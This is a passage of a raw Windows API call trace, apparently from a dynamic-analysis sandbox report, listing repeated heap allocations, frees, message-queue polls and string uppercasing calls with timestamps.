hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0215.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0215.858] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0215.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0215.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0215.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0215.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0215.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0215.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0215.858] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0215.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0215.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0215.858] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0215.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0215.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b18 [0215.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0215.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0215.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8ed4) returned 0x2a8a138 [0215.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0215.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b58 [0215.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0215.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0215.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a28 [0215.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0215.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0215.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a38 [0215.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0215.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0215.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae88 [0215.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0215.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0215.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0215.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0215.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8ed4) returned 0x2a9bef8 [0215.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0215.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0215.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0215.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0215.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0215.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0215.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0215.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0215.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0215.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0215.861] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0215.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0215.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0215.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0215.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0215.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0215.861] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0215.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0215.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0215.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0215.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0215.861] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0215.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0215.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0215.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0215.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0215.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0215.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0215.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0215.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0215.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0215.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0215.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0215.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0215.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0215.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0215.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0215.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0215.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0215.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0215.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0215.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0215.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0215.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0215.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0215.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0215.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0215.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0215.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0215.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0215.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0215.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0215.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0215.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.864] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0215.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0215.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0215.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0215.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0215.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0215.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0215.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0215.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0215.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0215.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0215.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0215.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.864] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0215.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0215.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0215.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0215.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0215.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0215.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0215.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0215.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0215.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0215.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0215.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0215.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0215.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0215.865] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0215.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0215.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0215.865] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0215.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0215.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0215.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0215.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0215.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0215.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0215.866] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0215.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0215.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0215.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0215.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0215.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0215.866] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0215.866] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0215.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0215.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0215.866] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0215.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab770 [0215.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ae8 [0215.866] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0215.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0215.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0215.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0215.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0215.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0215.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0215.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0215.867] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0215.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0215.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0215.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0215.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0215.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0215.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0215.868] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.868] HeapFree (in: 